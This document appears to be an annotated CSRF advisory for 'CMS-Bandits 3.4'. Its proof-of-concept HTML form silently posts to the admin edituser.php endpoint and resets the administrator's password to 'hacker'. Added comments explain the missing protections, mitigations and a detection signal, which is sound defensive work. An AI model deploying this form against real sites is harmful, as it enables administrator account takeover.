< ------------------- header data start ------------------- >
#############################################################
# Application Name : CMS-Bandits 3.4
# Vulnerability Type : CSRF (Cross-Site Request Forgery)
# Impact : Uzaktan otomatik olarak admin pass change edilebilir. (The admin password can be changed remotely and automatically.)
# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir. (A session-bound token must be added to the form, and the current password must be required before a change.)
# author : Bug Researchers/system-hacker
############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
<!-- Proof-of-concept CSRF form from the advisory. The markup is kept verbatim; only comments
     have been added. It replays the admin "edit user" POST for user_id=1 with an attacker
     chosen password (see the password / passwordagain fields below).
     What the target is missing, per the advisory header:
       * no anti-CSRF token bound to the victim's session is required by edituser.php;
       * the current password is not requested before a password change.
     Mitigation on the server side of edituser.php: verify a per-session synchronizer token on
     every state-changing POST, require the current password to set a new one, and reject
     cross-site requests (Origin/Referer check, SameSite session cookie). A repeated POST to
     this endpoint with a changed password and no preceding admin login is a useful
     detection signal in access logs. -->
<form method=post action=http://xxxxx.com/path/admin/edituser.php?_s_=4762849b&user_id=1>
<!-- NOTE(review): _s_ appears both in the action URL and as a hidden field with a fixed value.
     The PoC hardcoding it implies it does not act as a per-session secret; confirm against the
     application before relying on it as a CSRF defence. -->
<input type=hidden name=_s_ value=4762849b />
<input type=text name=user maxlength=25 value=admin class=standard />
<!-- Attacker chosen new password, supplied twice to satisfy the confirmation field. -->
<input type=password name=password maxlength=25 value=hacker />
<input type=password name=passwordagain maxlength=25 value=hacker class=standard />
<input type=text name=firstname maxlength=50 value=Admin class=standard />
<input type=text name=lastname maxlength=50 value=User class=standard />
<!-- "[email protected]" is most likely an e-mail obfuscation artifact from the page capture;
     the original address is not recoverable from this listing. -->
<input type=text name=email maxlength=255 value=[email protected] class=standard />
<!-- The <div class=pageoverflow> below is never closed in this listing; it appears to be
     leftover markup copied from the admin page rather than part of the PoC. -->
<input type=hidden name=active value=1 /> <div class=pageoverflow>
<!-- Target account and action selector: user_id=1 is the administrator record being edited. -->
<input type=hidden name=user_id value=1 />
<input type=hidden name=edituser value=true />
<!-- The curly quotes (’) in the event handlers are probably mis-encoded straight quotes from
     the original page; left as-is since these handlers only toggle a CSS class on hover. -->
<input class=pagebutton onmouseover=this.className=’pagebuttonhover’ onmouseout=this.className=’pagebutton’ type=submit value=Invia />
<input class=pagebutton onmouseover=this.className=’pagebuttonhover’ onmouseout=this.className=’pagebutton’ type=submit name=cancel value=Annulla />
</form>
< -- bug code end of -- >